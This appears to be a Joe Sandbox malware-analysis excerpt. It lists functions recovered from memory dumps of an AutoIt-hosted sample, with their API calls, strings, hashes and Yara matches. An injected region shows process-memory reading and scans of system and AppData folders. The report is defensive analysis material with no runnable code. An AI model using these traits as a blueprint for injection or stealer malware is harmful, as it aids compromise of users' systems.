Part of subcall function 00C638C8: __woutput_l.LIBCMT ref: 00C63921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00CA4488
LoadResource.KERNEL32(?,00000000), ref: 00CA4494
LockResource.KERNEL32(00000000), ref: 00CA44A1
FindResourceW.KERNEL32(?,?,00000003), ref: 00CA44C1
LoadResource.KERNEL32(?,00000000), ref: 00CA44D3
SizeofResource.KERNEL32(?,00000000), ref: 00CA44E2
LockResource.KERNEL32(?), ref: 00CA44EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CA454F

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 8fa89f8c4559f016eeb1cf6152570d2aa4e4d39fbdd162308493a1f1b91b1865
Instruction ID: eb8d90b3342ba4f3fb4e173367ce99b53d10afbb6578f47c3113dd8537e2735c
Opcode Fuzzy Hash: 8fa89f8c4559f016eeb1cf6152570d2aa4e4d39fbdd162308493a1f1b91b1865
Instruction Fuzzy Hash: 6331E17190225BABCB199FA4EC48BBF7BA9EF49304F10442AF916D2150D770DA11DB70

Function 00CB4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00CB4857
EmptyClipboard.USER32 ref: 00CB485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00CB4872
CloseClipboard.USER32 ref: 00CB4911

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: d8b6f1d76a103365813c2ac29ea6e008031435b293444fe229b5249d31692a6d
Instruction ID: 12f6fd0a2bb143f4be279901cb95501990f39e160cac0e893dc1b5ace0a50f3d
Opcode Fuzzy Hash: d8b6f1d76a103365813c2ac29ea6e008031435b293444fe229b5249d31692a6d
Instruction Fuzzy Hash: 0B21D831606210AFDB15AF64EC49F6E7BA8FF44711F208016F945DB2A2CB30ED01CB54

Function 047431F8 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 168fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,047434BA,?,00000000,00000000,00000050,00000000,00000000,?,04742F25), ref: 0474324C

Part of subcall function 047431F8: FindNextFileW.KERNEL32(00000000,?,00000000,?,00000000,047434BA,?,00000000,00000000,00000050,00000000,00000000,?,04742F25), ref: 04743408
Part of subcall function 047431F8: FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,047434BA,?,00000000,00000000,00000050,00000000,00000000,?,04742F25), ref: 0474341C

Strings

\AppData\, xrefs: 04743394
C:\ProgramData, xrefs: 04743331
C:\Program Files, xrefs: 047432F7
C:\Windows, xrefs: 047432BD
C:\Program Files (x86), xrefs: 0474336B

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: C:\Program Files$C:\Program Files (x86)$C:\ProgramData$C:\Windows$\AppData\
API String ID: 3541575487-3046630420
Opcode ID: 26294b9e6c748ae2d669a3d0d864298a86dcec6130d690e3a5338d076877cfd4
Instruction ID: d15c734eb7c01c218cd400f5baef142fb3df4fbd46e7be7eb2ac447d5c35d865
Opcode Fuzzy Hash: 26294b9e6c748ae2d669a3d0d864298a86dcec6130d690e3a5338d076877cfd4
Instruction Fuzzy Hash: EB61FE34B141199BEB10EBA4CC84AEEB7B9AF94208F5041E59948A7754EF30FE85CF54

Function 04722CF0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50nativewindowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 04722D11
SetBkMode.GDI32(?,00000001), ref: 04722D1C
TextOutA.GDI32(?,0000000A,0000000A,Hello, World!,0000000D), ref: 04722D30
EndPaint.USER32(?,?,?,?), ref: 04722D3A
PostQuitMessage.USER32(00000000), ref: 04722D43
NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 04722D54

Strings

Hello, World!, xrefs: 04722D23

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Paint$BeginMessageModeNtdllPostProc_QuitTextWindow
String ID: Hello, World!
API String ID: 3029869058-3964322768
Opcode ID: 0edebb723c1e77c206c82e43d1dbce7d06ebfc3dbb1fc4df77550d4f023725ea
Instruction ID: 49873e348d2e4f8c4f449c0658293997546cd8a8bec8723380393a01adcf49ad
Opcode Fuzzy Hash: 0edebb723c1e77c206c82e43d1dbce7d06ebfc3dbb1fc4df77550d4f023725ea
Instruction Fuzzy Hash: C20144B17412286BE710DAA8CD81FAF735CEF45614F004159FB44E7285E660FD0247A5

Function 00CA4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C52A58,?,00008000), ref: 00C602A4

Part of subcall function 00CA4FEC: GetFileAttributesW.KERNEL32(?,00CA3BFE), ref: 00CA4FED

FindFirstFileW.KERNEL32(?,?), ref: 00CA407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 00CA40CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 00CA40DD
FindClose.KERNEL32(00000000), ref: 00CA40F4
FindClose.KERNEL32(00000000), ref: 00CA40FD

Strings

\*.*, xrefs: 00CA404E

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: e0b9648877fd1eb68336df4b5f37b366cf784c15225f6aac74c0f8424f0379ee
Instruction ID: 12d6cdaf4439590a11a9de2cf4b8b560be164f27f3493c5baebd7eb41e3eff29
Opcode Fuzzy Hash: e0b9648877fd1eb68336df4b5f37b366cf784c15225f6aac74c0f8424f0379ee
Instruction Fuzzy Hash: B03183350093459FC304EB64C899AAFB7E8BE96305F440A1DF9E182192EB619A0DE757

Function 0471A79C Relevance: 9.2, Strings: 7, Instructions: 450COMMON

Download Yara Rule

Strings

VirtualAlloc, xrefs: 0471AAA2, 0471AAA5
GetP, xrefs: 0471A8AE
LoadLibraryA, xrefs: 0471AA92, 0471AA98
ReadProcessMemory, xrefs: 0471AABE, 0471AAC4
CloseHandle, xrefs: 0471AACE, 0471AAD4
ddre, xrefs: 0471A8B9
OpenProcess, xrefs: 0471AAAE, 0471AAB4

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID:
String ID: CloseHandle$GetP$LoadLibraryA$OpenProcess$ReadProcessMemory$VirtualAlloc$ddre
API String ID: 0-74115134
Opcode ID: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
Instruction ID: 670374f39f16869c9d01c0dfaccd9994c2325c392b258e850032c9260e1de80f
Opcode Fuzzy Hash: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
Instruction Fuzzy Hash: CB221670E04298DFDB11CBACC884B9EBBF5AF59304F184099E588AB352C375AE54CF65

Function 00CB696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CB69C7
WSAGetLastError.WSOCK32(00000000), ref: 00CB69D6
bind.WSOCK32(00000000,?,00000010), ref: 00CB69F2
listen.WSOCK32(00000000,00000005), ref: 00CB6A01
WSAGetLastError.WSOCK32(00000000), ref: 00CB6A1B
closesocket.WSOCK32(00000000,00000000), ref: 00CB6A2F

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 7f82583f0c93369419f075c23227f9b687fb4ed5e8b24a0b607b55095126ef4e
Instruction ID: 0db962f8a3e13976c86bc7c95d5834c1d638c370fa3f8ed169c212e27a22b273
Opcode Fuzzy Hash: 7f82583f0c93369419f075c23227f9b687fb4ed5e8b24a0b607b55095126ef4e
Instruction Fuzzy Hash: CB21B4346006009FCB10EF68CC89B6EB7A9EF44720F258559F966A73D1CB74AD01EB91

Function 0470BD8C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0470BEBB), ref: 0470BDF0
FindNextFileA.KERNEL32(00000000,00000010), ref: 0470BE7C
FindClose.KERNEL32(00000000,00000000,00000010), ref: 0470BE90

Strings

., xrefs: 0470BE09
*.*, xrefs: 0470BDD7

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: *.*$.
API String ID: 3541575487-358234090
Opcode ID: 1715996985112080631ff0bbda5297eb05bc15bcafc132a1bb74f0f07ca899d3
Instruction ID: 606f69efa4d3d9294522a6669dec8ef6f1ff7d83d22f027ff19bc7ba8cdffdd8
Opcode Fuzzy Hash: 1715996985112080631ff0bbda5297eb05bc15bcafc132a1bb74f0f07ca899d3
Instruction Fuzzy Hash: 5931447190121CDBEB64EAB4CC40BDEB3F8EF85304F5485E59648A73A0EB30BF458A54

Function 00CAC2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00CAC329
_wcscmp.LIBCMT ref: 00CAC359
_wcscmp.LIBCMT ref: 00CAC36E
FindNextFileW.KERNEL32(00000000,?), ref: 00CAC37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00CAC3AF

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 4b3ffc313cc66b844833bd00096d0a81ef3b9fc33b358e89ed2d3476540f6cdb
Instruction ID: 4014d04f994b92dffbcedf89e03f56d10d183220b47d6bde2f193d7d669feb7d
Opcode Fuzzy Hash: 4b3ffc313cc66b844833bd00096d0a81ef3b9fc33b358e89ed2d3476540f6cdb
Instruction Fuzzy Hash: A3519C35A046029FCB14DF68C4D0AAAB3E4FF4A314F10461DF966873A1DB30AD05DB91

Function 00CAC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00CACA75
CoCreateInstance.OLE32(00CD3D3C,00000000,00000001,00CD3BAC,?), ref: 00CACA8D

Part of subcall function 00C51A36: _memmove.LIBCMT ref: 00C51A77

CoUninitialize.OLE32 ref: 00CACCFA

Strings

.lnk, xrefs: 00CACA09, 00CACA31, 00CACA3B

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: cf80b6c75caea14efa9be5d9c9f4c72a7a3c4fc6b015cf596e308e82c5f0aff1
Instruction ID: 4f4123e5fbaae9d668251a0a8500eaef47a6bd8b9f7e5a3b457f0fd20722bc20
Opcode Fuzzy Hash: cf80b6c75caea14efa9be5d9c9f4c72a7a3c4fc6b015cf596e308e82c5f0aff1
Instruction Fuzzy Hash: 5EA16BB1504205AFD304EF64C885EAFB7E8FF84708F10491CF555972A2EB70EA49CB92

Function 00CBC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C8027A,?), ref: 00CBC6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CBC6F9

Strings

GetSystemWow64DirectoryW, xrefs: 00CBC6F3
kernel32.dll, xrefs: 00CBC6E2

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 87a8106c055951134fe4d9476401f25a60fbc6c070104dcdfe34f3020e9ae47c
Instruction ID: 070180f7bdcb153e730643a11d24a61bd6d38a8257a06d5e6d368b15aeb27928
Opcode Fuzzy Hash: 87a8106c055951134fe4d9476401f25a60fbc6c070104dcdfe34f3020e9ae47c
Instruction Fuzzy Hash: C2E012795117138FDB215B29DC8AF9A77D8FF04755F60842AE9A5E2350DB70DC408F50

Function 00C80030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C80034
__swprintf.LIBCMT ref: 00C80065

Strings

%.3d, xrefs: 00C8003F
WIN_XPe, xrefs: 00C800A4

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 83bb19b6a41e5faa73c4f24511eb555cd6f8f9e80577a9bd002c78687db02e53
Instruction ID: e39868285333216716eb0cfbd80026a6a7b029d7f285fbc08da4f53a9338659a
Opcode Fuzzy Hash: 83bb19b6a41e5faa73c4f24511eb555cd6f8f9e80577a9bd002c78687db02e53
Instruction Fuzzy Hash: 09D01272804118EAC794AB92CD45EF9737CFB08308F300053F546A2040D735974CAB2B

Function 0474476C Relevance: 6.1, APIs: 4, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 04724660: CloseHandle.KERNEL32(00000000), ref: 04724750

Sleep.KERNEL32(000001F4,?,00000000,047448C0), ref: 0474482B

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CloseHandleSleep
String ID:
API String ID: 252777609-0
Opcode ID: fd41149ea72597b417366381b0c0c1c1b5705757b2e533b546238b412d13cb7e
Instruction ID: 4be08bfc9a33c5c01cd9f46b1d51fe8133ff5cfefd650584cbb54bed4f718327
Opcode Fuzzy Hash: fd41149ea72597b417366381b0c0c1c1b5705757b2e533b546238b412d13cb7e
Instruction Fuzzy Hash: 0E419270A042449FE751EF69D840AAEB7F8FF85314F5084A9E540A7351EB74BD40DF25

Function 00CA4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00CA416D
Process32FirstW.KERNEL32(00000000,?), ref: 00CA417B
Process32NextW.KERNEL32(00000000,?), ref: 00CA419B
CloseHandle.KERNEL32(00000000), ref: 00CA4245

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: dc15b1e8472a2a453cc03e0b3c591601666b7a5741ec1ce2caf279b1e037b756
Instruction ID: e88dae1ce3c0caad1bf40e91d895e1a7a8a713f4370f8d85b2a8bd594aae4426
Opcode Fuzzy Hash: dc15b1e8472a2a453cc03e0b3c591601666b7a5741ec1ce2caf279b1e037b756
Instruction Fuzzy Hash: CE31F6711083019FC304EF54D889BAFBBE8EFC5315F54062DF991C21A1EBB1AA48CB52

Function 046F89F4 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 046F8A0F
FindClose.KERNEL32(00000000,00000000,?), ref: 046F8A1A
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 046F8A33
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 046F8A44

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: FileTime$Find$CloseDateFirstLocal
String ID:
API String ID: 2659516521-0
Opcode ID: 868875b699540809eebe213be3a9e3515718323174a30cf1cecf8381443eb6e6
Instruction ID: 4603164561a1314deee20e2c8e943f3b90d5ba3136ddf6e282771fd2b7bc31f1
Opcode Fuzzy Hash: 868875b699540809eebe213be3a9e3515718323174a30cf1cecf8381443eb6e6
Instruction Fuzzy Hash: B6F0FFB290024CA6DF60EAE4CC849CFB3AC9F04318F5006AAA679D3191FB34AB454B65

Function 046F8AFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,C:\Program Files (x86)\Microsoft\EdgeUpdate\,?,04719F23,00000000,0471A02F,?,?,?,?,0471A087,00000000,04719606,00000001), ref: 046F8B17
GetLastError.KERNEL32(00000000,?,00000000,C:\Program Files (x86)\Microsoft\EdgeUpdate\,?,04719F23,00000000,0471A02F,?,?,?,?,0471A087,00000000,04719606,00000001), ref: 046F8B3C

Part of subcall function 046F8A90: FileTimeToLocalFileTime.KERNEL32(?), ref: 046F8AC0
Part of subcall function 046F8A90: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 046F8ACF

Part of subcall function 046F8B70: FindClose.KERNEL32(?,?,046F8B3A,00000000,?,00000000,C:\Program Files (x86)\Microsoft\EdgeUpdate\,?,04719F23,00000000,0471A02F,?,?,?,?,0471A087), ref: 046F8B7C

Strings

C:\Program Files (x86)\Microsoft\EdgeUpdate\, xrefs: 046F8AFD

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: FileTime$Find$CloseDateErrorFirstLastLocal
String ID: C:\Program Files (x86)\Microsoft\EdgeUpdate\
API String ID: 976985129-435251725
Opcode ID: 7683402a07a3cc41915343d3355d80590edd3b9017ca34065ff9d4749be2325c
Instruction ID: eb6aeb543ca894617dd2b1be80ab42766e3779bcc5b2e147c71b9b9e36a79d4e
Opcode Fuzzy Hash: 7683402a07a3cc41915343d3355d80590edd3b9017ca34065ff9d4749be2325c
Instruction Fuzzy Hash: D0E09BB2B111210757147E7C9C8155F66C899946B534907FEEBA4DB345F724EC1303D4

Function 0474BA70 Relevance: 4.8, APIs: 3, Instructions: 305fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0474BFC4,?,?,?,?,0000005D,00000000,00000000), ref: 0474BAFB
FindNextFileW.KERNEL32(?,?,00000000,0474BE62,?,00000000,?,00000000,0474BFC4,?,?,?,?,0000005D,00000000,00000000), ref: 0474BE38
FindClose.KERNEL32(?,0474BE69,0474BE62,?,00000000,?,00000000,0474BFC4,?,?,?,?,0000005D,00000000,00000000), ref: 0474BE5C

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: acb9716f87b2f936b9887c9035bf572f0d8ae311d6d70b83b83cb5c8a9960368
Instruction ID: a5df335aa6892a3822999a3f8a4f14444d29f78db89d13854b10726df5c4c800
Opcode Fuzzy Hash: acb9716f87b2f936b9887c9035bf572f0d8ae311d6d70b83b83cb5c8a9960368
Instruction Fuzzy Hash: 75D1FC34A1115E9BEB10EB60DC84AEEB3B9BF94308F5045E5D54867A24EF30BF858F58

Function 00CB29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CB1ED6,00000000), ref: 00CB2AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CB2AE4

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: f3d116f182fcdd764cbe067e2b7516e5ed4bb264fa4f9f306c7b2ea89806b88a
Instruction ID: 90c87c7f0263c82fd7dca94f94785f01c31a7d96068b09f8b77e388dea44353e
Opcode Fuzzy Hash: f3d116f182fcdd764cbe067e2b7516e5ed4bb264fa4f9f306c7b2ea89806b88a
Instruction Fuzzy Hash: F741B271A00209BFEB20DE95CCC5FFFB7ACEB40764F10406AF615A7141EB71AE41AA60

Function 04723D68 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

Part of subcall function 046F4E94: SysAllocStringLen.OLEAUT32(?,?), ref: 046F4EA2

FindFirstFileW.KERNEL32(00000000,?), ref: 04723DEF
FindNextFileW.KERNEL32(000000FF,?,00000000,04723EA4,?,?,?,?,00000000,?), ref: 04723E84
FindClose.KERNEL32(000000FF,04723EAB,04723EA4,?,?,?,?,00000000,?), ref: 04723E9E

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Find$File$AllocCloseFirstNextString
String ID:
API String ID: 41380636-0
Opcode ID: e1ce098e7e5c92f8ef9c9b4c39eb86f8cf3facbf69c5fb82b3caeea1e0e59c93
Instruction ID: 3ef13400693fd4866cec14bba8f5a4e91a81c612e35156ab9b89a9517ba0c64a
Opcode Fuzzy Hash: e1ce098e7e5c92f8ef9c9b4c39eb86f8cf3facbf69c5fb82b3caeea1e0e59c93
Instruction Fuzzy Hash: 6441F874E042199FEB10EFA4C98499EB7B4FF48304F5045A99918A3754EB34AE49CF54

